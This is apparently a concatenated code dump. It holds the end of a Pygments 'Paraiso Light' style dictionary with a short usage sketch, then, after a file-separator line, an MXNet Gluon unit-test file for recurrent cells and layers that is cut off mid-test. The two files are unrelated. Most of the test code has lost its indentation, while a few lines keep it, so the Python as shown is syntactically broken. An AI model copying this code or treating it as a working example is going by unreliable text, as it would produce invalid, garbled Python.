Keyword.Type: YELLOW, # class: 'kt'
Operator: AQUA, # class: 'o'
Operator.Word: "", # class: 'ow' - like keywords
Punctuation: FOREGROUND, # class: 'p'
Name: FOREGROUND, # class: 'n'
Name.Attribute: BLUE, # class: 'na' - to be revised
Name.Builtin: "", # class: 'nb'
Name.Builtin.Pseudo: "", # class: 'bp'
Name.Class: YELLOW, # class: 'nc' - to be revised
Name.Constant: RED, # class: 'no' - to be revised
Name.Decorator: AQUA, # class: 'nd' - to be revised
Name.Entity: "", # class: 'ni'
Name.Exception: RED, # class: 'ne'
Name.Function: BLUE, # class: 'nf'
Name.Property: "", # class: 'py'
Name.Label: "", # class: 'nl'
Name.Namespace: YELLOW, # class: 'nn' - to be revised
Name.Other: BLUE, # class: 'nx'
Name.Tag: AQUA, # class: 'nt' - like a keyword
Name.Variable: RED, # class: 'nv' - to be revised
Name.Variable.Class: "", # class: 'vc' - to be revised
Name.Variable.Global: "", # class: 'vg' - to be revised
Name.Variable.Instance: "", # class: 'vi' - to be revised
Number: ORANGE, # class: 'm'
Number.Float: "", # class: 'mf'
Number.Hex: "", # class: 'mh'
Number.Integer: "", # class: 'mi'
Number.Integer.Long: "", # class: 'il'
Number.Oct: "", # class: 'mo'
Literal: ORANGE, # class: 'l'
Literal.Date: GREEN, # class: 'ld'
String: GREEN, # class: 's'
String.Backtick: "", # class: 'sb'
String.Char: FOREGROUND, # class: 'sc'
String.Doc: COMMENT, # class: 'sd' - like a comment
String.Double: "", # class: 's2'
String.Escape: ORANGE, # class: 'se'
String.Heredoc: "", # class: 'sh'
String.Interpol: ORANGE, # class: 'si'
String.Other: "", # class: 'sx'
String.Regex: "", # class: 'sr'
String.Single: "", # class: 's1'
String.Symbol: "", # class: 'ss'
Generic: "", # class: 'g'
Generic.Deleted: RED, # class: 'gd',
Generic.Emph: "italic", # class: 'ge'
Generic.Error: "", # class: 'gr'
Generic.Heading: "bold " + FOREGROUND, # class: 'gh'
Generic.Inserted: GREEN, # class: 'gi'
Generic.Output: "", # class: 'go'
Generic.Prompt: "bold " + COMMENT, # class: 'gp'
Generic.Strong: "bold", # class: 'gs'
Generic.Subheading: "bold " + AQUA, # class: 'gu'
Generic.Traceback: "", # class: 'gt'
}
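# --- Editor's illustrative sketch (not part of the original style module) ----------------
# Renders a small snippet to a standalone HTML page with this style, using only the
# standard Pygments API.
if __name__ == '__main__':
    from pygments import highlight
    from pygments.lexers import PythonLexer
    from pygments.formatters import HtmlFormatter
    formatter = HtmlFormatter(style=ParaisoLightStyle, full=True)
    print(highlight("def greet(name):\n    return 'hi ' + name\n", PythonLexer(), formatter))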
|
py | b410362c8fd16545df27364c269de86527958577 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import mxnet as mx
from mxnet import gluon, nd
import numpy as np
import copy
from numpy.testing import assert_allclose
import unittest
from mxnet.test_utils import almost_equal, assert_almost_equal
from common import assert_raises_cudnn_not_satisfied
def test_rnn():
cell = gluon.rnn.RNNCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight',
'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_lstm():
cell = gluon.rnn.LSTMCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_lstm_forget_bias():
forget_bias = 2.0
stack = gluon.rnn.SequentialRNNCell()
stack.add(gluon.rnn.LSTMCell(100, i2h_bias_initializer=mx.init.LSTMBias(forget_bias), prefix='l0_'))
stack.add(gluon.rnn.LSTMCell(100, i2h_bias_initializer=mx.init.LSTMBias(forget_bias), prefix='l1_'))
dshape = (32, 1, 200)
data = mx.sym.Variable('data')
sym, _ = stack.unroll(1, data, merge_outputs=True)
mod = mx.mod.Module(sym, label_names=None, context=mx.cpu(0))
mod.bind(data_shapes=[('data', dshape)], label_shapes=None)
mod.init_params()
bias_argument = next(x for x in sym.list_arguments() if x.endswith('i2h_bias'))
expected_bias = np.hstack([np.zeros((100,)),
forget_bias * np.ones(100, ), np.zeros((2 * 100,))])
assert_allclose(mod.get_params()[0][bias_argument].asnumpy(), expected_bias)
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_cpu_inference():
# should behave the same as lstm cell
EXPECTED_LSTM_OUTPUT = np.array([[[0.72045636, 0.72045636, 0.95215213, 0.95215213],
[0.72045636, 0.72045636, 0.95215213, 0.95215213]],
[[0.95215213, 0.95215213, 0.72045636, 0.72045636],
[0.95215213, 0.95215213, 0.72045636, 0.72045636]]])
x = mx.nd.ones(shape=(2, 2, 2))
model = mx.gluon.rnn.LSTM(2, num_layers=6, bidirectional=True)
model_cell = model._unfuse()
model.initialize(mx.init.One())
y = model(x).asnumpy()
y_cell = model_cell.unroll(2, x, layout='TNC', merge_outputs=True)[0].asnumpy()
mx.test_utils.assert_almost_equal(y_cell, EXPECTED_LSTM_OUTPUT,
rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(y, EXPECTED_LSTM_OUTPUT,
rtol=1e-3, atol=1e-5)
def test_gru():
cell = gluon.rnn.GRUCell(100, prefix='rnn_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == ['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
assert outputs.list_outputs() == ['rnn_t0_out_output', 'rnn_t1_out_output', 'rnn_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_residual():
cell = gluon.rnn.ResidualCell(gluon.rnn.GRUCell(50, prefix='rnn_'))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == \
['rnn_h2h_bias', 'rnn_h2h_weight', 'rnn_i2h_bias', 'rnn_i2h_weight']
# assert outputs.list_outputs() == \
# ['rnn_t0_out_plus_residual_output', 'rnn_t1_out_plus_residual_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 50), (10, 50)]
outputs = outputs.eval(rnn_t0_data=mx.nd.ones((10, 50)),
rnn_t1_data=mx.nd.ones((10, 50)),
rnn_i2h_weight=mx.nd.zeros((150, 50)),
rnn_i2h_bias=mx.nd.zeros((150,)),
rnn_h2h_weight=mx.nd.zeros((150, 50)),
rnn_h2h_bias=mx.nd.zeros((150,)))
expected_outputs = np.ones((10, 50))
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
assert np.array_equal(outputs[1].asnumpy(), expected_outputs)
def test_residual_bidirectional():
cell = gluon.rnn.ResidualCell(
gluon.rnn.BidirectionalCell(
gluon.rnn.GRUCell(25, prefix='rnn_l_'),
gluon.rnn.GRUCell(25, prefix='rnn_r_')))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=False)
outputs = mx.sym.Group(outputs)
assert sorted(cell.collect_params().keys()) == \
['rnn_l_h2h_bias', 'rnn_l_h2h_weight', 'rnn_l_i2h_bias', 'rnn_l_i2h_weight',
'rnn_r_h2h_bias', 'rnn_r_h2h_weight', 'rnn_r_i2h_bias', 'rnn_r_i2h_weight']
# assert outputs.list_outputs() == \
# ['bi_t0_plus_residual_output', 'bi_t1_plus_residual_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 50), (10, 50)]
outputs = outputs.eval(rnn_t0_data=mx.nd.ones((10, 50))+5,
rnn_t1_data=mx.nd.ones((10, 50))+5,
rnn_l_i2h_weight=mx.nd.zeros((75, 50)),
rnn_l_i2h_bias=mx.nd.zeros((75,)),
rnn_l_h2h_weight=mx.nd.zeros((75, 25)),
rnn_l_h2h_bias=mx.nd.zeros((75,)),
rnn_r_i2h_weight=mx.nd.zeros((75, 50)),
rnn_r_i2h_bias=mx.nd.zeros((75,)),
rnn_r_h2h_weight=mx.nd.zeros((75, 25)),
rnn_r_h2h_bias=mx.nd.zeros((75,)))
expected_outputs = np.ones((10, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
assert np.array_equal(outputs[1].asnumpy(), expected_outputs)
def test_stack():
cell = gluon.rnn.SequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
keys = sorted(cell.collect_params().keys())
for i in range(5):
assert 'rnn_stack%d_h2h_weight'%i in keys
assert 'rnn_stack%d_h2h_bias'%i in keys
assert 'rnn_stack%d_i2h_weight'%i in keys
assert 'rnn_stack%d_i2h_bias'%i in keys
assert outputs.list_outputs() == ['rnn_stack4_t0_out_output', 'rnn_stack4_t1_out_output', 'rnn_stack4_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_hybridstack():
cell = gluon.rnn.HybridSequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
keys = sorted(cell.collect_params().keys())
for i in range(5):
assert 'rnn_stack%d_h2h_weight'%i in keys
assert 'rnn_stack%d_h2h_bias'%i in keys
assert 'rnn_stack%d_i2h_weight'%i in keys
assert 'rnn_stack%d_i2h_bias'%i in keys
assert outputs.list_outputs() == ['rnn_stack4_t0_out_output', 'rnn_stack4_t1_out_output', 'rnn_stack4_t2_out_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
# Test HybridSequentialRNNCell nested in nn.HybridBlock, SequentialRNNCell will fail in this case
class BidirectionalOfSequential(gluon.HybridBlock):
def __init__(self):
super(BidirectionalOfSequential, self).__init__()
with self.name_scope():
cell0 = gluon.rnn.HybridSequentialRNNCell()
cell0.add(gluon.rnn.LSTMCell(100))
cell0.add(gluon.rnn.LSTMCell(100))
cell1 = gluon.rnn.HybridSequentialRNNCell()
cell1.add(gluon.rnn.LSTMCell(100))
cell1.add(gluon.rnn.LSTMCell(100))
self.rnncell = gluon.rnn.BidirectionalCell(cell0, cell1)
def hybrid_forward(self, F, x):
return self.rnncell.unroll(3, x, layout="NTC", merge_outputs=True)
x = mx.nd.random.uniform(shape=(10, 3, 100))
net = BidirectionalOfSequential()
net.collect_params().initialize()
outs, _ = net(x)
assert outs.shape == (10, 3, 200)
def test_bidirectional():
cell = gluon.rnn.BidirectionalCell(
gluon.rnn.LSTMCell(100, prefix='rnn_l0_'),
gluon.rnn.LSTMCell(100, prefix='rnn_r0_'),
output_prefix='rnn_bi_')
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
assert outputs.list_outputs() == ['rnn_bi_t0_output', 'rnn_bi_t1_output', 'rnn_bi_t2_output']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 200), (10, 200), (10, 200)]
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_layer_bidirectional():
class RefBiLSTM(gluon.Block):
def __init__(self, size, **kwargs):
super(RefBiLSTM, self).__init__(**kwargs)
with self.name_scope():
self._lstm_fwd = gluon.rnn.LSTM(size, bidirectional=False, prefix='l0')
self._lstm_bwd = gluon.rnn.LSTM(size, bidirectional=False, prefix='r0')
def forward(self, inpt):
fwd = self._lstm_fwd(inpt)
bwd_inpt = nd.flip(inpt, 0)
bwd = self._lstm_bwd(bwd_inpt)
bwd = nd.flip(bwd, 0)
return nd.concat(fwd, bwd, dim=2)
size = 7
in_size = 5
weights = {}
for d in ['l', 'r']:
weights['lstm_{}0_i2h_weight'.format(d)] = mx.random.uniform(shape=(size*4, in_size))
weights['lstm_{}0_h2h_weight'.format(d)] = mx.random.uniform(shape=(size*4, size))
weights['lstm_{}0_i2h_bias'.format(d)] = mx.random.uniform(shape=(size*4,))
weights['lstm_{}0_h2h_bias'.format(d)] = mx.random.uniform(shape=(size*4,))
net = gluon.rnn.LSTM(size, bidirectional=True, prefix='lstm_')
ref_net = RefBiLSTM(size, prefix='lstm_')
net.initialize()
ref_net.initialize()
net_params = net.collect_params()
ref_net_params = ref_net.collect_params()
for k in weights:
net_params[k].set_data(weights[k])
ref_net_params[k.replace('l0', 'l0l0').replace('r0', 'r0l0')].set_data(weights[k])
data = mx.random.uniform(shape=(11, 10, in_size))
assert_allclose(net(data).asnumpy(), ref_net(data).asnumpy())
def test_zoneout():
cell = gluon.rnn.ZoneoutCell(gluon.rnn.RNNCell(100, prefix='rnn_'), zoneout_outputs=0.5,
zoneout_states=0.5)
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(3)]
outputs, _ = cell.unroll(3, inputs)
outputs = mx.sym.Group(outputs)
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10,50), rnn_t1_data=(10,50), rnn_t2_data=(10,50))
assert outs == [(10, 100), (10, 100), (10, 100)]
def test_unroll_layout():
cell = gluon.rnn.HybridSequentialRNNCell()
for i in range(5):
if i == 1:
cell.add(gluon.rnn.ResidualCell(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_' % i)))
else:
cell.add(gluon.rnn.LSTMCell(100, prefix='rnn_stack%d_'%i))
cell.collect_params().initialize()
inputs = [mx.nd.random.uniform(shape=(10,50)) for _ in range(3)]
outputs, _ = cell.unroll(3, inputs, layout='TNC')
assert outputs[0].shape == (10, 100)
assert outputs[1].shape == (10, 100)
assert outputs[2].shape == (10, 100)
outputs, _ = cell.unroll(3, inputs, layout='NTC')
assert outputs[0].shape == (10, 100)
assert outputs[1].shape == (10, 100)
assert outputs[2].shape == (10, 100)
def check_rnn_forward(layer, inputs, deterministic=True):
if isinstance(inputs, mx.nd.NDArray):
inputs.attach_grad()
else:
for x in inputs:
x.attach_grad()
layer.collect_params().initialize()
with mx.autograd.record():
out = layer.unroll(3, inputs, merge_outputs=False)[0]
mx.autograd.backward(out)
out = layer.unroll(3, inputs, merge_outputs=True)[0]
out.backward()
np_out = out.asnumpy()
if isinstance(inputs, mx.nd.NDArray):
np_dx = inputs.grad.asnumpy()
else:
np_dx = np.stack([x.grad.asnumpy() for x in inputs], axis=1)
layer.hybridize()
with mx.autograd.record():
out = layer.unroll(3, inputs, merge_outputs=False)[0]
mx.autograd.backward(out)
out = layer.unroll(3, inputs, merge_outputs=True)[0]
out.backward()
if isinstance(inputs, mx.nd.NDArray):
input_grads = inputs.grad.asnumpy()
else:
input_grads = np.stack([x.grad.asnumpy() for x in inputs], axis=1)
if deterministic:
mx.test_utils.assert_almost_equal(np_out, out.asnumpy(), rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(np_dx, input_grads, rtol=1e-3, atol=1e-5)
def test_rnn_cells():
check_rnn_forward(gluon.rnn.LSTMCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.RNNCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.GRUCell(100, input_size=200), mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.LSTMCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
check_rnn_forward(gluon.rnn.RNNCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
check_rnn_forward(gluon.rnn.GRUCell(100, input_size=200),
[mx.nd.ones((8, 200)), mx.nd.ones((8, 200)), mx.nd.ones((8, 200))])
bilayer = gluon.rnn.BidirectionalCell(gluon.rnn.LSTMCell(100, input_size=200),
gluon.rnn.LSTMCell(100, input_size=200))
check_rnn_forward(bilayer, mx.nd.ones((8, 3, 200)))
check_rnn_forward(gluon.rnn.DropoutCell(0.5), mx.nd.ones((8, 3, 200)), False)
check_rnn_forward(gluon.rnn.ZoneoutCell(gluon.rnn.LSTMCell(100, input_size=200),
0.5, 0.2),
mx.nd.ones((8, 3, 200)), False)
net = gluon.rnn.SequentialRNNCell()
net.add(gluon.rnn.LSTMCell(100, input_size=200))
net.add(gluon.rnn.RNNCell(100, input_size=100))
net.add(gluon.rnn.GRUCell(100, input_size=100))
check_rnn_forward(net, mx.nd.ones((8, 3, 200)))
def test_rnn_cells_export_import():
class RNNLayer(gluon.HybridBlock):
def __init__(self):
super(RNNLayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.RNNCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
class LSTMLayer(gluon.HybridBlock):
def __init__(self):
super(LSTMLayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.LSTMCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
class GRULayer(gluon.HybridBlock):
def __init__(self):
super(GRULayer, self).__init__()
with self.name_scope():
self.cell = gluon.rnn.GRUCell(hidden_size=1)
def hybrid_forward(self, F, seq):
outputs, state = self.cell.unroll(inputs=seq, length=2, merge_outputs=True)
return outputs
for hybrid in [RNNLayer(), LSTMLayer(), GRULayer()]:
hybrid.initialize()
hybrid.hybridize()
input = mx.nd.ones(shape=(1, 2, 1))
output1 = hybrid(input)
hybrid.export(path="./model", epoch=0)
symbol = mx.gluon.SymbolBlock.imports(
symbol_file="./model-symbol.json",
input_names=["data"],
param_file="./model-0000.params",
ctx=mx.Context.default_ctx
)
output2 = symbol(input)
assert_almost_equal(output1.asnumpy(), output2.asnumpy())
def check_rnn_layer_forward(layer, inputs, states=None, run_only=False, ctx=mx.cpu()):
layer.collect_params().initialize(ctx=ctx)
inputs = inputs.as_in_context(ctx)
inputs.attach_grad()
if states is not None:
if isinstance(states, (list, tuple)):
states = [s.as_in_context(ctx) for s in states]
else:
states = states.as_in_context(ctx)
with mx.autograd.record():
if states is None:
out = layer(inputs)
else:
out = layer(inputs, states)
if states is not None:
assert isinstance(out, (list, tuple)) and len(out) == 2
out = out[0]
else:
assert isinstance(out, mx.nd.NDArray)
out.backward()
np_out = out.asnumpy()
np_dx = inputs.grad.asnumpy()
layer.hybridize()
with mx.autograd.record():
if states is not None:
out = layer(inputs, states)
assert isinstance(out, (list, tuple)) and len(out) == 2
out = out[0]
else:
out = layer(inputs)
assert isinstance(out, mx.nd.NDArray)
out.backward()
if states is not None:
layer(inputs, states) # test is_training = false
else:
layer(inputs)
if not run_only:
mx.test_utils.assert_almost_equal(np_out, out.asnumpy(), rtol=1e-3, atol=1e-5)
mx.test_utils.assert_almost_equal(np_dx, inputs.grad.asnumpy(), rtol=1e-3, atol=1e-5)
def run_rnn_layers(dtype, dtype2, ctx=mx.cpu()):
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2,dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype), ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2,dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), [mx.nd.ones((4, 3, 10), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype)],ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dtype=dtype, ), mx.nd.ones((8, 3, 20), dtype=dtype),ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dtype=dtype, bidirectional=True), mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype),ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, dtype=dtype, dropout=0.5), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.RNN(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2, dropout=0.5, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.LSTM(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype),
[mx.nd.ones((4, 3, 10), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype)], run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, dropout=0.5, dtype=dtype), mx.nd.ones((8, 3, 20), dtype=dtype),
run_only=True, ctx=ctx)
check_rnn_layer_forward(gluon.rnn.GRU(10, 2, bidirectional=True, dropout=0.5, dtype=dtype),
mx.nd.ones((8, 3, 20), dtype=dtype), mx.nd.ones((4, 3, 10), dtype=dtype), run_only=True, ctx=ctx)
net = gluon.nn.Sequential()
net.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype2))
net.add(gluon.nn.BatchNorm(axis=2))
net.add(gluon.nn.Flatten())
net.add(gluon.nn.Dense(3, activation='relu'))
net.collect_params().initialize(ctx=ctx)
net.cast(dtype)
with mx.autograd.record():
out = net(mx.nd.ones((2, 3, 10), dtype=dtype, ctx=ctx))
out.backward()
out = out.asnumpy()
net2 = gluon.nn.HybridSequential()
net2.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype2))
net2.add(gluon.nn.BatchNorm(axis=2))
net2.add(gluon.nn.Flatten())
net2.add(gluon.nn.Dense(3, activation='relu'))
net2.hybridize()
net2.collect_params().initialize(ctx=ctx)
net2.cast(dtype)
with mx.autograd.record():
out = net2(mx.nd.ones((2, 3, 10), dtype=dtype, ctx=ctx))
out.backward()
out = out.asnumpy()
net3 = gluon.nn.HybridSequential()
net3.add(gluon.rnn.LSTM(10, bidirectional=True, dtype=dtype))
net3.add(gluon.nn.BatchNorm(axis=2))
net3.add(gluon.nn.Flatten())
net3.add(gluon.nn.Dense(3, activation='relu'))
net3.hybridize()
net3.collect_params().initialize(ctx=ctx)
net3.cast(dtype2)
with mx.autograd.record():
out = net3(mx.nd.ones((2, 3, 10), dtype=dtype2, ctx=ctx))
out.backward()
out = out.asnumpy()
def test_rnn_layers_fp32():
run_rnn_layers('float32', 'float32')
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
@unittest.skipIf(mx.context.num_gpus() == 0, "RNN FP16 only implemented for GPU for now")
def test_rnn_layers_fp16():
run_rnn_layers('float16', 'float32', mx.gpu())
def test_rnn_unroll_variant_length():
# Test for imperative usage
cell_list = []
for base_cell_class in [gluon.rnn.RNNCell, gluon.rnn.LSTMCell, gluon.rnn.GRUCell]:
cell_list.append(base_cell_class(20))
cell_list.append(gluon.rnn.BidirectionalCell(
l_cell=base_cell_class(20),
r_cell=base_cell_class(20)))
cell_list.append(gluon.contrib.rnn.VariationalDropoutCell(base_cell=base_cell_class(20)))
stack_res_rnn_cell = gluon.rnn.SequentialRNNCell()
stack_res_rnn_cell.add(gluon.rnn.ResidualCell(base_cell=gluon.rnn.RNNCell(20)))
stack_res_rnn_cell.add(gluon.rnn.ResidualCell(base_cell=gluon.rnn.RNNCell(20)))
cell_list.append(stack_res_rnn_cell)
batch_size = 4
max_length = 10
valid_length = [3, 10, 5, 6]
valid_length_nd = mx.nd.array(valid_length)
for cell in cell_list:
cell.collect_params().initialize()
cell.hybridize()
# Test for NTC layout
data_nd = mx.nd.random.normal(0, 1, shape=(batch_size, max_length, 20))
outs, states = cell.unroll(length=max_length, inputs=data_nd,
valid_length=valid_length_nd,
merge_outputs=True,
layout='NTC')
for i, ele_length in enumerate(valid_length):
# Explicitly unroll each sequence and compare the final states and output
ele_out, ele_states = cell.unroll(length=ele_length,
inputs=data_nd[i:(i+1), :ele_length, :],
merge_outputs=True,
layout='NTC')
assert_allclose(ele_out.asnumpy(), outs[i:(i+1), :ele_length, :].asnumpy(),
atol=1E-4, rtol=1E-4)
if ele_length < max_length:
# Check the padded outputs are all zero
assert_allclose(outs[i:(i+1), ele_length:max_length, :].asnumpy(), 0)
for valid_out_state, gt_state in zip(states, ele_states):
assert_allclose(valid_out_state[i:(i+1)].asnumpy(), gt_state.asnumpy(),
atol=1E-4, rtol=1E-4)
# Test for TNC layout
data_nd = mx.nd.random.normal(0, 1, shape=(max_length, batch_size, 20))
outs, states = cell.unroll(length=max_length, inputs=data_nd,
valid_length=valid_length_nd,
layout='TNC')
for i, ele_length in enumerate(valid_length):
# Explicitly unroll each sequence and compare the final states and output
ele_out, ele_states = cell.unroll(length=ele_length,
inputs=data_nd[:ele_length, i:(i+1), :],
merge_outputs=True,
layout='TNC')
assert_allclose(ele_out.asnumpy(), outs[:ele_length, i:(i + 1), :].asnumpy(),
atol=1E-4, rtol=1E-4)
if ele_length < max_length:
# Check the padded outputs are all zero
assert_allclose(outs[ele_length:max_length, i:(i+1), :].asnumpy(), 0)
for valid_out_state, gt_state in zip(states, ele_states):
assert_allclose(valid_out_state[i:(i+1)].asnumpy(), gt_state.asnumpy(),
atol=1E-4, rtol=1E-4)
# For the symbolic test, we need to make sure that it can be bound and run
data = mx.sym.var('data', shape=(4, 10, 2))
cell = gluon.rnn.RNNCell(100)
valid_length = mx.sym.var('valid_length', shape=(4,))
outs, states = cell.unroll(length=10, inputs=data, valid_length=valid_length,
merge_outputs=True, layout='NTC')
mod = mx.mod.Module(states[0], data_names=('data', 'valid_length'), label_names=None,
context=mx.cpu())
mod.bind(data_shapes=[('data', (4, 10, 2)), ('valid_length', (4,))], label_shapes=None)
mod.init_params()
mod.forward(mx.io.DataBatch([mx.random.normal(0, 1, (4, 10, 2)), mx.nd.array([3, 6, 10, 2])]))
mod.get_outputs()[0].asnumpy()
def test_cell_fill_shape():
cell = gluon.rnn.LSTMCell(10)
cell.hybridize()
check_rnn_forward(cell, mx.nd.ones((2, 3, 7)))
assert cell.i2h_weight.shape[1] == 7, cell.i2h_weight.shape[1]
def test_layer_fill_shape():
layer = gluon.rnn.LSTM(10)
layer.hybridize()
check_rnn_layer_forward(layer, mx.nd.ones((3, 2, 7)))
print(layer)
assert layer.l0_i2h_weight.shape[1] == 7, layer.l0_i2h_weight.shape[1]
def test_bidirectional_unroll_valid_length():
    # Test BidirectionalCell.
    # In version 1.3.1, BidirectionalCell failed when valid_length was passed to unroll() after hybridize().
class BiLSTM(gluon.nn.HybridBlock):
def __init__(self, rnn_size, time_step, **kwargs):
super(BiLSTM, self).__init__(**kwargs)
self.time_step = time_step
with self.name_scope():
self.bi_lstm = gluon.rnn.BidirectionalCell(
gluon.rnn.LSTMCell(rnn_size, prefix='rnn_l0_'),
gluon.rnn.LSTMCell(rnn_size, prefix='rnn_r0_'),
output_prefix='lstm_bi_')
def hybrid_forward(self, F, inputs, valid_len):
outputs, states = self.bi_lstm.unroll(self.time_step, inputs, valid_length=valid_len,
layout='NTC', merge_outputs=True)
return outputs, states
rnn_size, time_step = 100, 3
net = BiLSTM(rnn_size, time_step)
net.initialize()
net.hybridize()
